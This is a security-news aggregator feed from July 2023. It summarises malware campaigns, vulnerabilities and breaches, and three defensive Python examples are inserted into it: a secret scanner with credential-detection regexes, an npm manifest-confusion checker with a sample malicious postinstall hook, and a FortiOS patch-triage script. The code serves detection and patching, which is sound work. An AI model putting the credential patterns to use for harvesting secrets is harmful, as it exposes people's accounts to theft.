CISOs, security leaders, and SOC teams often struggle with limited visibility into all connections made to their company-owned assets and networks. They are hindered by a lack of open-source intelligence and powerful technology required for proactive, continuous, and effective discovery and protection of their systems, data, and assets. As advanced threat actors constantly search for easily exploitable vulnerabilities around the clock, CISOs are in pursuit of improved methods to reduce threat exposures and safeguard their assets, users, and data from relentless cyber-attacks and the severe consequences of breaches. In response to this need, an emerging solution addressing the most critical priorities at the initial stage of the attack chain has provided security leaders with a new tool to manage their most pressing threat exposures at their origin. Leading analyst firm Gartner Research describes the solution: "By 2026, organizations prioritizing their security investments based...The Hacker News
July 7, 2023 – Government
CISA and FBI warn of Truebot infecting US and Canada based organizations Full Text
Abstract
CISA and the FBI warned today of a new Truebot variant employed in attacks against organizations in the United States and Canada. A new variant of the Truebot malware was used in attacks against organizations in the United States and Canada. Threat...Security Affairs
July 7, 2023 – Vulnerabilities
CISA, FBI, MS-ISAC, and CCCS Warn of Truebot Infecting US and Canadian Organizations Full Text
Abstract
The threat actors behind the attacks compromised target networks by exploiting a critical remote code execution (RCE) vulnerability in the Netwrix Auditor software tracked as CVE-2022-31199.Cyware
July 07, 2023 – Ransomware
BlackByte 2.0 Ransomware: Infiltrate, Encrypt, and Extort in Just 5 Days Full Text
Abstract
Ransomware attacks are a major problem for organizations everywhere, and the severity of this problem continues to intensify. Recently, Microsoft's Incident Response team investigated the BlackByte 2.0 ransomware attacks and exposed these cyber strikes' terrifying velocity and damaging nature. The findings indicate that hackers can complete the entire attack process, from gaining initial access to causing significant damage, in just five days. They waste no time infiltrating systems, encrypting important data, and demanding a ransom to release it. This shortened timeline poses a significant challenge for organizations trying to protect themselves against these harmful operations. BlackByte ransomware is used in the final stage of the attack, using an 8-digit number key to encrypt the data. To carry out these attacks, hackers use a powerful combination of tools and techniques. The investigation revealed that they take advantage of unpatched Microsoft Exchange Servers—an...The Hacker News
July 07, 2023 – Vulnerabilities
Google Releases Android Patch Update for 3 Actively Exploited Vulnerabilities Full Text
Abstract
Google has released its monthly security updates for the Android operating system, addressing 46 new software vulnerabilities. Among these, three vulnerabilities have been identified as actively exploited in targeted attacks. One of the vulnerabilities tracked as CVE-2023-26083 is a memory leak flaw affecting the Arm Mali GPU driver for Bifrost, Avalon, and Valhall chips. This particular vulnerability was exploited in a previous attack that enabled spyware infiltration on Samsung devices in December 2022. This vulnerability was regarded as serious enough to prompt the Cybersecurity and Infrastructure Security Agency (CISA) to issue a patching order for federal agencies in April 2023. Another significant vulnerability, identified as CVE-2021-29256, is a high-severity issue that affects specific versions of the Bifrost and Midgard Arm Mali GPU kernel drivers. This flaw permits an unprivileged user to gain unauthorized access to sensitive data and escalate privileges to the root lev...The Hacker News
July 07, 2023 – Attack
JumpCloud Resets API Keys Amid Ongoing Cybersecurity Incident Full Text
Abstract
JumpCloud, a provider of cloud-based identity and access management solutions, has swiftly reacted to an ongoing cybersecurity incident that impacted some of its clients. As part of its damage control efforts, JumpCloud has reset the application programming interface (API) keys of all customers affected by this event, aiming to protect their valuable data. The company has informed the concerned clients about the critical nature of this move, reinforcing its commitment to safeguarding their operations and organizations. This API key reset will, however, disrupt certain functionalities like AD import, HRIS integrations, JumpCloud PowerShell modules, JumpCloud Slack apps, Directory Insights Serverless apps, ADMU, third-party zero-touch MDM packages, Command Triggers, Okta SCIM integration, Azure AD SCIM integration, Workato, Aquera, Tray, and more. Despite the potential disruptions, JumpCloud maintains that the key reset is for the greater good of its clients. For those needing assis...The Hacker News
July 07, 2023 – Malware
Cybersecurity Agencies Sound Alarm on Rising TrueBot Malware Attacks Full Text
Abstract
Cybersecurity agencies have warned about the emergence of new variants of the TrueBot malware. This enhanced threat is now targeting companies in the U.S. and Canada with the intention of extracting confidential data from infiltrated systems. These sophisticated attacks exploit a critical vulnerability (CVE-2022-31199) in the widely used Netwrix Auditor server and its associated agents. This vulnerability enables unauthorized attackers to execute malicious code with the SYSTEM user's privileges, granting them unrestricted access to compromised systems. The TrueBot malware, linked with cybercriminal collectives Silence and FIN11, is deployed to siphon off data and disseminate ransomware, jeopardising the safety of numerous infiltrated networks. The cybercriminals gain their initial foothold by exploiting the cited vulnerability, then proceed to install TrueBot. Once they have breached the networks, they install the FlawedGrace Remote Access Trojan (RAT) to escalate their p...The Hacker News
July 6, 2023 – Malware
TeamsPhisher Tool Exploits Microsoft Teams to Deploy Malware Full Text
Abstract
A new tool available on GitHub can enable attackers to misuse a recently disclosed vulnerability in Microsoft Teams and automatically deliver malicious files to users' systems.Cyware
July 06, 2023 – Malware
Iranian Hackers’ Sophisticated Malware Targets Windows and macOS Users Full Text
Abstract
The Iranian nation-state actor known as TA453 has been linked to a new set of spear-phishing attacks that infect both Windows and macOS operating systems with malware. "TA453 eventually used a variety of cloud hosting providers to deliver a novel infection chain that deploys the newly identified PowerShell backdoor GorjolEcho," Proofpoint said in a new report. "When given the opportunity, TA453 ported its malware and attempted to launch an Apple flavored infection chain dubbed NokNok. TA453 also employed multi-persona impersonation in its unending espionage quest." TA453, also known by the names APT35, Charming Kitten, Mint Sandstorm, and Yellow Garuda, is a threat group linked to Iran's Islamic Revolutionary Guard Corps (IRGC) that has been active since at least 2011. Most recently, Volexity highlighted the adversary's use of an updated version of a PowerShell implant called CharmPower (aka GhostEcho or POWERSTAR). In the attack sequence discove...The Hacker News
July 6, 2023 – Vulnerabilities
Cisco warns of a flaw in Nexus 9000 series switches that allows modifying encrypted traffic Full Text
Abstract
Cisco warns of a high-severity vulnerability in Nexus 9000 series switches that can allow attackers to read or modify encrypted traffic. Cisco disclosed a high-severity vulnerability, tracked as CVE-2023-20185 (CVSS Score 7.4), in the Cisco ACI Multi-Site...Security Affairs
July 6, 2023 – Ransomware
RedEnergy: New Stealer-as-a-Ransomware Out in the Wild Full Text
Abstract
The recent detection of RedEnergy stealer-as-a-ransomware represents an advanced threat that combines stealthy data theft and encryption techniques to cause significant damage and seize control over its targets.Cyware
July 06, 2023 – Denial Of Service
Surviving the 800 Gbps Storm: Gain Insights from Gcore’s 2023 DDoS Attack Statistics Full Text
Abstract
Gcore Radar is a quarterly report prepared by Gcore that provides insights into the current state of the DDoS protection market and cybersecurity trends. This report offers you an understanding of the evolving threat landscape and highlights the measures required to protect against attacks effectively. It serves as an insight for businesses and individuals seeking to stay informed about the latest developments in cybersecurity. As we entered 2023, the cybersecurity landscape witnessed an increase in sophisticated, high-volume attacks. Here, we present the current state of the DDoS protection market based on Gcore's statistics. Key Highlights from Q1–Q2: The maximum attack power rose from 600 to 800 Gbps. UDP flood attacks were most common and amounted to 52% of total attacks, while SYN flood accounted for 24%. In third place was TCP flood. The most-attacked business sectors are gaming, telecom, and financial. The longest attack duration in the year's first half was seve...The Hacker News
July 6, 2023 – Vulnerabilities
StackRot, a new Linux Kernel privilege escalation vulnerability Full Text
Abstract
StackRot is a new security vulnerability in the Linux kernel that could be exploited to gain elevated privileges on a target system. A security vulnerability, dubbed StackRot, was found impacting Linux versions 6.1 through 6.4. The issue, tracked...Security Affairs
July 6, 2023 – Breach
28,000 Employees Impacted by Data Breach at Pepsi Bottling Ventures Full Text
Abstract
Discovered on January 10, the data breach occurred between December 23, 2022, and January 19, 2023, and resulted in the personal, financial, and health information of the company’s employees being accessed by an unauthorized party.Cyware
July 06, 2023 – Vulnerabilities
Researchers Uncover New Linux Kernel ‘StackRot’ Privilege Escalation Vulnerability Full Text
Abstract
Details have emerged about a newly identified security flaw in the Linux kernel that could allow a user to gain elevated privileges on a target host. Dubbed StackRot (CVE-2023-3269, CVSS score: 7.8), the flaw impacts Linux versions 6.1 through 6.4. There is no evidence that the shortcoming has been exploited in the wild to date. "As StackRot is a Linux kernel vulnerability found in the memory management subsystem, it affects almost all kernel configurations and requires minimal capabilities to trigger," Peking University security researcher Ruihan Li said. "However, it should be noted that maple nodes are freed using RCU callbacks, delaying the actual memory deallocation until after the RCU grace period. Consequently, exploiting this vulnerability is considered challenging." Following responsible disclosure on June 15, 2023, it has been addressed in stable versions 6.1.37, 6.3.11, and 6.4.1 as of July 1, 2023, after a two-week effort led by Linus Tor...The Hacker News
July 6, 2023 – General
Ransomware accounts for 54% of cyber threats in the health sector Full Text
Abstract
The European Union Agency for Cybersecurity (ENISA) releases its first cyber threat landscape report for the health sector. The European Union Agency for Cybersecurity (ENISA) releases today its first cyber threat landscape report for the health...Security Affairs
July 6, 2023 – Hacker
Crysis Threat Actors Use RDP Connections to Distribute Venus Ransomware Full Text
Abstract
ASEC recently discovered that Crysis ransomware attackers were scanning the internet, via brute force or dictionary attacks, for vulnerable RDP endpoints to install Venus ransomware on systems.Cyware
July 06, 2023 – Education
How Pen Testing can Soften the Blow on Rising Costs of Cyber Insurance Full Text
Abstract
As technology advances and organizations become more reliant on data, the risks associated with data breaches and cyber-attacks also increase. The introduction of data privacy laws, such as the GDPR, has made it mandatory for organizations to disclose breaches of personal data to those affected. As such, it has become essential for businesses to protect themselves from the financial and reputational costs of cyber incidents. One solution to help organizations protect themselves is cyber insurance, despite the rising costs of cyber insurance, where the average price in the U.S. rose 79% in the second quarter of 2022. Also, with strict eligibility requirements that have emerged in response to risk and sharp spikes in successful breaches during and post-COVID-19, cyber insurance remains essential for organizations to protect sensitive customer information and their own data from falling into the wrong hands. While cyber insurance is not a one-size-fits-all solution and may not cover...The Hacker News
July 6, 2023 – Vulnerabilities
CVE-2022-29303 flaw in SolarView product can be exploited in attacks against the energy sector Full Text
Abstract
A vulnerability in the Contec SolarView product can be exploited in attacks targeting organizations in the energy sector. Researchers from the cybersecurity firm VulnCheck reported that the vulnerability CVE-2022-29303 in the solar power monitoring Contec SolarView...Security Affairs
July 6, 2023 – Business
Node4 acquires ThreeTwoFour to strengthen its security capabilities Full Text
Abstract
The acquisition is Node4’s third significant growth purchase in the last 18 months, having also bought risual, an IT managed services and solutions provider and Tisski, a leading UK-based independent Microsoft Business applications partner.Cyware
July 06, 2023 – Attack
Silentbob Campaign: Cloud-Native Environments Under Attack Full Text
Abstract
Cybersecurity researchers have unearthed an attack infrastructure that's being used as part of a "potentially massive campaign" against cloud-native environments. "This infrastructure is in early stages of testing and deployment, and is mainly consistent of an aggressive cloud worm, designed to deploy on exposed JupyterLab and Docker APIs in order to deploy Tsunami malware, cloud credentials hijack, resource hijack, and further infestation of the worm," cloud security firm Aqua said. The activity, dubbed Silentbob in reference to an AnonDNS domain set up by the attacker, is said to be linked to the infamous cryptojacking group tracked as TeamTNT, citing overlaps in tactics, techniques, and procedures (TTPs). However, the involvement of an "advanced copycat" hasn't been ruled out. Aqua's investigation was prompted in the aftermath of an attack targeting its honeypot in early June 2023, leading to the discovery of four malicious contThe Hacker News
July 6, 2023 – General
Small organizations face security threats on a limited budget Full Text
Abstract
Small organizations face the same security threats as organizations overall but have fewer resources to address them, according to Netwrix. The most common security incidents are phishing, ransomware, and user account compromise.Cyware
July 06, 2023 – Criminals
INTERPOL Nabs Hacking Crew OPERA1ER’s Leader Behind $11 Million Cybercrime Full Text
Abstract
A suspected senior member of a French-speaking hacking crew known as OPERA1ER has been arrested as part of an international law enforcement operation codenamed Nervone, Interpol has announced. "The group is believed to have stolen an estimated USD 11 million -- potentially as much as 30 million -- in more than 30 attacks across 15 countries in Africa, Asia, and Latin America," the agency said. The arrest was made by authorities in Côte d'Ivoire early last month. Additional insight was provided by the U.S. Secret Service's Criminal Investigative Division and Booz Allen Hamilton DarkLabs. The financially motivated collective is also known by the aliases Common Raven, DESKTOP-GROUP, and NX$M$. Its modus operandi was first exposed by Group-IB and Orange CERT Coordination Center (Orange-CERT-CC) in November 2022, detailing its intrusions on banks, financial services, and telecom companies between March 2018 and October 2022. Earlier this January, Broadcom's SThe Hacker News
July 6, 2023 – Breach
Large Indian Tech Retailer Exposes Employee and Customer Data Full Text
Abstract
The tech retailer Poorvika exposed sensitive employee and customer data through a non-password-protected database. The exposure included a vast number of records, including personal information, email addresses, tax invoices, and payment receipts.Cyware
July 5, 2023 – Ransomware
Ransomware Redefined: RedEnergy Stealer-as-a-Ransomware Full Text
Abstract
RedEnergy stealer uses a fake update campaign to target multiple industry verticals and possesses the ability to steal information from various browsers while also incorporating different modules for carrying out ransomware activities.Cyware
July 05, 2023 – Ransomware
RedEnergy Stealer-as-a-Ransomware Threat Targeting Energy and Telecom Sectors Full Text
Abstract
A sophisticated stealer-as-a-ransomware threat dubbed RedEnergy has been spotted in the wild targeting energy utilities, oil, gas, telecom, and machinery sectors in Brazil and the Philippines through their LinkedIn pages. The malware "possesses the ability to steal information from various browsers, enabling the exfiltration of sensitive data, while also incorporating different modules for carrying out ransomware activities," Zscaler researchers Shatak Jain and Gurkirat Singh said in a recent analysis. The goal, the researchers noted, is to couple data theft with encryption in order to inflict maximum damage on the victims. The starting point for the multi-stage attack is a FakeUpdates (aka SocGholish) campaign that tricks users into downloading JavaScript-based malware under the guise of web browser updates. What makes it novel is the use of reputable LinkedIn pages to target victims, redirecting users clicking on the website URLs to a bogus landing pageThe Hacker News
July 5, 2023 – Malware
RedEnergy Stealer-as-a-Ransomware employed in attacks in the wild Full Text
Abstract
RedEnergy is a sophisticated stealer-as-a-ransomware that Zscaler ThreatLabz researchers observed in attacks targeting the energy utilities, oil, gas, telecom, and machinery sectors...Security Affairs
July 5, 2023 – Attack
European Entities Targeted in SmugX Campaign Full Text
Abstract
Check Point spotted a new campaign by a Chinese threat actor targeting diplomatic entities in Europe. Dubbed SmugX, the campaign uses HTML smuggling to deploy a new variant of the PlugX RAT. The campaign reportedly overlaps with the activity of RedDelta and Mustang Panda.Cyware
July 05, 2023 – Education
Secrets, Secrets Are No Fun. Secrets, Secrets (Stored in Plain Text Files) Hurt Someone Full Text
Abstract
Secrets are meant to be hidden or, at the very least, only known to a specific and limited set of individuals (or systems). Otherwise, they aren't really secrets. In personal life, a secret revealed can damage relationships, lead to social stigma, or, at the very least, be embarrassing. In a developer's or application security engineer's professional life, the consequences of exposing secrets can lead to breaches of security, data leaks, and, well, also be embarrassing. And while there are tools available for detecting secrets in source code and code repositories, there are few options for identifying secrets in plain text, documents, emails, chat logs, content management systems, and more. What Are Secrets? In the context of applications, secrets are sensitive information such as passwords, API keys, cryptographic keys, and other confidential data that an application needs to function but should not be exposed to unauthorized users. Secrets are typically stored securely and accessThe Hacker News
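The gap the article describes, secrets sitting in documents and chat logs rather than in a repository, can be covered with the same two techniques repository scanners use: fixed-format patterns for credentials with a known shape, and an entropy test for generic "key = value" assignments so that placeholders like "changeme1" are not reported. The scanner below is an added example written for this page, not a tool from the article; the sample text is constructed (the AWS key is the well-known documentation example key, the GitHub token is a made-up string of the right length) and the 3.5 bits-per-character entropy cutoff is an assumed tuning value.

```python
"""Scan free-form text (docs, chat logs, tickets) for leaked secrets.

Added example, not part of the article. Fixed-format credentials are matched
by pattern alone; generic assignments are only reported when the value's
Shannon entropy looks like a real token rather than a placeholder.
"""
import math
import re

ENTROPY_MIN = 3.5   # bits per character; assumed cutoff, tune on your own corpus

PATTERNS = [
    # (kind, regex, minimum entropy the captured value must have)
    ("aws_access_key_id", re.compile(r"\bAKIA[0-9A-Z]{16}\b"), 0.0),
    ("github_pat", re.compile(r"\bghp_[A-Za-z0-9]{36}\b"), 0.0),
    ("generic_assignment",
     re.compile(r"(?i)\b(?:password|passwd|pwd|secret|api[_-]?key|token)\b\s*[:=]\s*['\"]?([^\s'\"]{8,})"),
     ENTROPY_MIN),
]

# Constructed sample: a deployment note with a pasted chat transcript.
SAMPLE_TEXT = """\
Deployment notes (constructed sample, not real credentials)
Set AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE in the CI environment.
[chat] alice: the staging api_key = q8Zx2vL9pT4mN7kR1wY6 if you need it
[chat] bob: thanks, password: changeme1 still works for the test box
token = placeholder
Personal access token: ghp_0123456789abcdefghijklmnopqrstuvwxyz
"""


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0.0 for the empty string)."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def redact(value: str) -> str:
    """Keep enough of the value to locate it, never the whole secret."""
    return f"{value[:4]}...({len(value)} chars)"


def scan_text(text: str) -> list:
    """Return findings as dicts {line, kind, value(redacted)} in line order."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        seen = set()   # a value reported by a specific pattern is not re-reported as generic
        for kind, regex, min_entropy in PATTERNS:
            for m in regex.finditer(line):
                value = m.group(m.lastindex or 0)   # capture group if the pattern has one
                if value in seen or shannon_entropy(value) < min_entropy:
                    continue
                seen.add(value)
                findings.append({"line": lineno, "kind": kind, "value": redact(value)})
    return findings


if __name__ == "__main__":
    for f in scan_text(SAMPLE_TEXT):
        print(f"line {f['line']}: {f['kind']} {f['value']}")
```

The entropy gate is what makes the generic rule usable on prose: "password: changeme1" and "token = placeholder" both match the regex but score under 3 bits per character and are dropped, while a random 20-character API key scores above 4.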
July 5, 2023 – Attack
The Port of Nagoya, the largest Japanese port, suffered a ransomware attack Full Text
Abstract
The Port of Nagoya, the largest port in Japan, suffered a ransomware attack that severely impacted its operations. The Port of Nagoya, in the Ise Bay, is the largest and busiest trading port in Japan, accounting for about 10% of the total trade value...Security Affairs
July 5, 2023 – Criminals
Ransomware Criminals Are Dumping Kids’ Private Files Online After School Hacks Full Text
Abstract
Complete sexual assault case folios containing these details were among more than 300,000 files dumped online in March after the 36,000-student Minneapolis Public Schools refused to pay a $1 million ransom.Cyware
July 05, 2023 – Malware
Node.js Users Beware: Manifest Confusion Attack Opens Door to Malware Full Text
Abstract
The npm registry for the Node.js JavaScript runtime environment is susceptible to what's called a manifest confusion attack that could potentially allow threat actors to conceal malware in project dependencies or perform arbitrary script execution during installation. "A npm package's manifest is published independently from its tarball," Darcy Clarke, a former GitHub and npm engineering manager, said in a technical write-up published last week. "Manifests are never fully validated against the tarball's contents." "The ecosystem has broadly assumed the contents of the manifest and tarball are consistent," Clarke added. The problem, at its core, stems from the fact that the manifest and package metadata are decoupled and that they are never cross-referenced against one another, thereby leading to unexpected behavior and misuse when there is a mismatch. As a result, a threat actor could exploit this loophole to publish a module with a maThe Hacker News
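Because the registry serves the manifest and the tarball separately, the defensive check is to open the tarball and compare its own package.json with the registry's copy before trusting either. The script below is an added example, not code from the write-up or from npm; it builds a stand-in tarball in memory (constructed, so it runs offline) and reports the fields that disagree. In real use the registry document would come from the package's registry metadata and the tarball from its dist.tarball URL.

```python
"""Detect npm manifest confusion: registry manifest vs. package.json inside the tarball.

Added example, not from the article or npm. The tarball is built in memory so
the check runs offline; swap in a downloaded .tgz and the registry JSON for
real packages.
"""
import io
import json
import tarfile

# Fields where a mismatch changes what gets installed or executed.
CHECKED_FIELDS = ("name", "version", "dependencies", "scripts")


def build_tarball(package_json: dict) -> bytes:
    """Constructed stand-in for a published tarball: package/package.json only."""
    buf = io.BytesIO()
    data = json.dumps(package_json).encode()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo("package/package.json")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def tarball_manifest(tarball: bytes) -> dict:
    """Read package/package.json out of an npm-style .tgz."""
    with tarfile.open(fileobj=io.BytesIO(tarball), mode="r:gz") as tar:
        with tar.extractfile("package/package.json") as fh:
            return json.load(fh)


def manifest_mismatches(registry_manifest: dict, tarball: bytes) -> dict:
    """Return {field: {"registry": ..., "tarball": ...}} for every checked field that differs."""
    inner = tarball_manifest(tarball)
    diffs = {}
    for field in CHECKED_FIELDS:
        reg_value, tar_value = registry_manifest.get(field), inner.get(field)
        if reg_value != tar_value:
            diffs[field] = {"registry": reg_value, "tarball": tar_value}
    return diffs


# Constructed: what a registry listing shows vs. what the tarball actually carries.
REGISTRY_VIEW = {"name": "left-pad-ng", "version": "1.0.0", "dependencies": {}, "scripts": {}}
TARBALL_VIEW = {
    "name": "left-pad-ng",
    "version": "1.0.0",
    "dependencies": {"evil-helper": "^1.0.0"},
    "scripts": {"postinstall": "node ./setup.js"},
}

if __name__ == "__main__":
    for field, pair in manifest_mismatches(REGISTRY_VIEW, build_tarball(TARBALL_VIEW)).items():
        print(f"{field}: registry={pair['registry']!r} tarball={pair['tarball']!r}")
```

A package whose registry view shows no install scripts or dependencies while its tarball declares a postinstall hook and an extra dependency is exactly the discrepancy the write-up warns about; any non-empty result from this check is grounds to quarantine the package.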
July 5, 2023 – Malware
NoName(057)16’s DDoSia Project’s gets an upgrade Full Text
Abstract
The DDoSia attack tool has received an upgrade that adds a new security mechanism to conceal the list of targets. Researchers at the cybersecurity firm Sekoia analyzed an updated variant of the DDoSia attack tool that was developed and used by the pro-Russia...Security Affairs
July 5, 2023 – Outage
Poly Network Loses Millions of Dollars in Crypto Assets Full Text
Abstract
The services of the company were suspended early Sunday and during the afternoon the company shared a Google spreadsheet showing crypto assets that have been stolen by the attackers.Cyware
July 05, 2023 – Privacy
Instagram’s Twitter Alternative ‘Threads’ Launch Halted in Europe Over Privacy Concerns Full Text
Abstract
Instagram Threads, the upcoming Twitter competitor from Meta, will not be launched in the European Union due to privacy concerns, according to Ireland's Data Protection Commission (DPC). The development was reported by the Irish Independent, which said the watchdog has been in contact with the social media giant about the new product and confirmed the release won't extend to the E.U. "at this point." Threads is Meta's answer to Twitter that's set for launch on July 6, 2023. It's billed as a "text-based conversation app" that allows Instagram users to "discuss everything from the topics you care about today to what'll be trending tomorrow." It also enables users to follow the same accounts they already follow on Instagram. A listing for the app has already appeared in the Apple App Store and Google Play Store, although it's yet to be available for download. The "App Privacy" section on the App Store indicThe Hacker News
July 5, 2023 – Privacy
Swedish data protection authority rules against the use of Google Analytics Full Text
Abstract
The Swedish data protection watchdog has warned companies against using Google Analytics due to the risk of surveillance by the US government...Security Affairs
July 5, 2023 – Criminals
Teen among suspects arrested in Android banking malware scheme Full Text
Abstract
Preliminary findings suggest that seven men, two women aged 19 to 27, and a 16-year-old facilitated the scam by providing their bank accounts, Internet banking credentials, and Singpass credentials to perpetrators for monetary gain.Cyware
July 5, 2023 – General
75% of consumers prepared to ditch brands hit by ransomware Full Text
Abstract
81% of consumers report feeling “very scared or worried” about their data being held by organizations lacking robust resilience against ransomware. After an attack, one in three consumers demands evidence of resilient backup and recovery strategies.Cyware
July 5, 2023 – Vulnerabilities
Ghostscript Bug Could Allow Rogue Documents to Run System Commands Full Text
Abstract
Ghostscript reads in PostScript program code, which describes how to construct the pages in a document, and converts it, or renders it, into a format more suitable for displaying or printing, such as raw pixel data or a PNG graphics file.Cyware
July 4, 2023 – Phishing
U.S. Law Firms Targeted in New GuLoader Campaign Full Text
Abstract
GuLoader is increasingly prevalent as a malware loader within phishing campaigns. Morphisec Labs uncovered a GuLoader campaign that has been targeting law firms (46.4%), alongside investment (17.9%) and healthcare (21.4%) firms, in the U.S. The campaign has been ongoing since April.Cyware
July 04, 2023 – Government
Swedish Data Protection Authority Warns Companies Against Google Analytics Use Full Text
Abstract
The Swedish data protection watchdog has warned companies against using Google Analytics due to risks posed by U.S. government surveillance, following similar moves by Austria, France, and Italy last year. The development comes in the aftermath of an audit initiated by the Swedish Authority for Privacy Protection (IMY) against four companies: CDON, Coop, Dagens Industri, and Tele2. "In its audits, IMY considers that the data transferred to the U.S. via Google's statistics tool is personal data because the data can be linked with other unique data that is transferred," IMY said. "The authority also concludes that the technical security measures that the companies have taken are not sufficient to ensure a level of protection that essentially corresponds to that guaranteed within the EU/EEA." The data protection authority also fined Swedish telecom service provider Tele2 $1.1 million and local online marketplace CDON less than $30,000 for failing toThe Hacker News
July 4, 2023 – Breach
MOVEit attack on Aon exposed data of the staff at the Dublin Airport Full Text
Abstract
Personal data of the personnel at the Dublin Airport was compromised due to a MOVEit attack on professional service provider Aon. Data of about 3000 employees of Dublin Airport (DDA) were compromised after professional service provider Aon fell victim...Security Affairs
July 4, 2023 – General
Manufacturing companies hit by ransomware had their data encrypted: Report Full Text
Abstract
The percentage of manufacturing organizations that used backups to recover data has increased, with 73% of the manufacturing organizations surveyed using backups this year versus 58% in the previous year.Cyware
July 04, 2023 – Hacker
DDoSia Attack Tool Evolves with Encryption, Targeting Multiple Sectors Full Text
Abstract
The threat actors behind the DDoSia attack tool have come up with a new version that incorporates a new mechanism to retrieve the list of targets to be bombarded with junk HTTP requests in an attempt to bring them down. The updated variant, written in Golang, "implements an additional security mechanism to conceal the list of targets, which is transmitted from the [command-and-control] to the users," cybersecurity company Sekoia said in a technical write-up. DDoSia is attributed to a pro-Russian hacker group called NoName(057)16. Launched in 2022 and a successor of the Bobik botnet, the attack tool is designed for staging distributed denial-of-service (DDoS) attacks against targets primarily located in Europe as well as Australia, Canada, and Japan. Lithuania, Ukraine, Poland, Italy, Czechia, Denmark, Latvia, France, the U.K., and Switzerland have emerged as the most targeted countries over a period ranging from May 8 to June 26, 2023. A total of 486 different wThe Hacker News
July 4, 2023 – Criminals
Neo_Net runs eCrime campaign targeting clients of banks globally Full Text
Abstract
A joint study by vx-underground and SentinelOne revealed that a Mexican threat actor who goes online by the moniker Neo_Net is behind an Android malware campaign targeting banks worldwide...Security Affairs
July 4, 2023 – Malware
New Malware Alert: EarlyRAT Linked to North Korean Hacking Group Full Text
Abstract
EarlyRAT is a straightforward program that immediately starts gathering system data and sending it via a POST request to the C2 server. The execution of commands on the infected system is EarlyRAT’s second main purpose.Cyware
July 04, 2023 – Criminals
Mexico-Based Hacker Targets Global Banks with Android Malware Full Text
Abstract
An e-crime actor of Mexican provenance has been linked to an Android mobile malware campaign targeting financial institutions globally, but with a specific focus on Spanish and Chilean banks, from June 2021 to April 2023. The activity is being attributed to an actor codenamed Neo_Net, according to security researcher Pol Thill. The findings were published by SentinelOne following a Malware Research Challenge in collaboration with vx-underground. "Despite using relatively unsophisticated tools, Neo_Net has achieved a high success rate by tailoring their infrastructure to specific targets, resulting in the theft of over 350,000 EUR from victims' bank accounts and compromising Personally Identifiable Information (PII) of thousands of victims," Thill said. Some of the major targets include banks such as Santander, BBVA, CaixaBank, Deutsche Bank, Crédit Agricole, and ING. Neo_Net, linked to a Spanish-speaking actor residing in Mexico, has established themselves as aThe Hacker News
July 4, 2023 – Outage
Hackers stole millions of dollars worth of crypto assets from Poly Network platform Full Text
Abstract
The Poly Network platform suspended its services over the weekend after a cyber attack in which threat actors stole millions of dollars worth of crypto assets...Security Affairs
July 4, 2023 – Breach
Major Data Leaks on TikTok, Instagram, and Yahoo Full Text
Abstract
A SOCRadar dark web analyst recently discovered an alleged database leak for Instagram. The leaked data reportedly contains over 17 million records in JSON format. The nature of the data suggests that it may have been collected from open source.Cyware
July 04, 2023 – Vulnerabilities
Alert: 330,000 FortiGate Firewalls Still Unpatched to CVE-2023-27997 RCE Flaw Full Text
Abstract
No less than 330,000 FortiGate firewalls are still unpatched and vulnerable to CVE-2023-27997, a critical security flaw affecting Fortinet devices that has come under active exploitation in the wild. Cybersecurity firm Bishop Fox, in a report published last week, said that out of nearly 490,000 Fortinet SSL-VPN interfaces exposed on the internet, about 69 percent remain unpatched. CVE-2023-27997 (CVSS score: 9.8), also called XORtigate, is a critical vulnerability impacting Fortinet FortiOS and FortiProxy SSL-VPN appliances that could allow a remote attacker to execute arbitrary code or commands via specifically crafted requests. Patches were released by Fortinet last month in versions 6.0.17, 6.2.15, 6.4.13, 7.0.12, and 7.2.5, although the company acknowledged that the flaw may have been "exploited in a limited number of cases" in attacks targeting government, manufacturing, and critical infrastructure sectors. Bishop Fox's analysis further found that 153,414The Hacker News
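The first thing a defender wants from a report like this is a quick answer for their own inventory: is each FortiOS branch at or past the fixed release? The helper below is an added example written for this page, not Bishop Fox's scanner; it encodes only the fixed versions the report names (6.0.17, 6.2.15, 6.4.13, 7.0.12, 7.2.5), parses the "vX.Y.Z,buildNNNN" form that FortiOS prints in its status output, and treats any branch not on that list as needing manual review rather than guessing. The inventory strings and build numbers are constructed.

```python
"""Triage FortiOS version strings against the CVE-2023-27997 fixed releases.

Added example, not Bishop Fox's tooling. Fixed versions are those named in the
report; anything on an unlisted branch is returned as "unknown-branch" so it is
reviewed rather than silently marked safe.
"""
import re

# (major, minor) branch -> first patch release that contains the fix, per the report
FIXED = {(6, 0): 17, (6, 2): 15, (6, 4): 13, (7, 0): 12, (7, 2): 5}

# Matches "v7.0.11" inside strings such as "FortiGate-60F v7.0.11,build0000 (GA.F)"
VERSION_RE = re.compile(r"v?(\d+)\.(\d+)\.(\d+)")


def parse_version(s: str) -> tuple:
    """Extract (major, minor, patch) from a FortiOS version/build string."""
    m = VERSION_RE.search(s)
    if not m:
        raise ValueError(f"no version found in {s!r}")
    return tuple(int(x) for x in m.groups())


def patch_status(s: str) -> str:
    """'patched', 'vulnerable', or 'unknown-branch' for a version string."""
    major, minor, patch = parse_version(s)
    fixed_patch = FIXED.get((major, minor))
    if fixed_patch is None:
        return "unknown-branch"
    return "patched" if patch >= fixed_patch else "vulnerable"


def triage(inventory: dict) -> dict:
    """Group {host: version_string} into the three status buckets."""
    out = {"patched": [], "vulnerable": [], "unknown-branch": []}
    for host, version in inventory.items():
        out[patch_status(version)].append(host)
    return out


# Constructed inventory; hostnames and build numbers are placeholders.
SAMPLE_INVENTORY = {
    "fw-edge-1": "FortiGate-60F v7.0.11,build0000,230324 (GA.F)",
    "fw-edge-2": "v7.2.5,build0000",
    "fw-lab": "v6.4.14",
    "fw-old": "v5.6.3",
}

if __name__ == "__main__":
    for status, hosts in triage(SAMPLE_INVENTORY).items():
        print(f"{status}: {', '.join(hosts) or '-'}")
```

A version check is a necessary first pass, not proof of exposure or safety: the report's headline number came from fingerprinting the internet-facing SSL-VPN interface, so a device on a fixed release with the VPN portal unnecessarily exposed still deserves attention.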
July 4, 2023 – Vulnerabilities
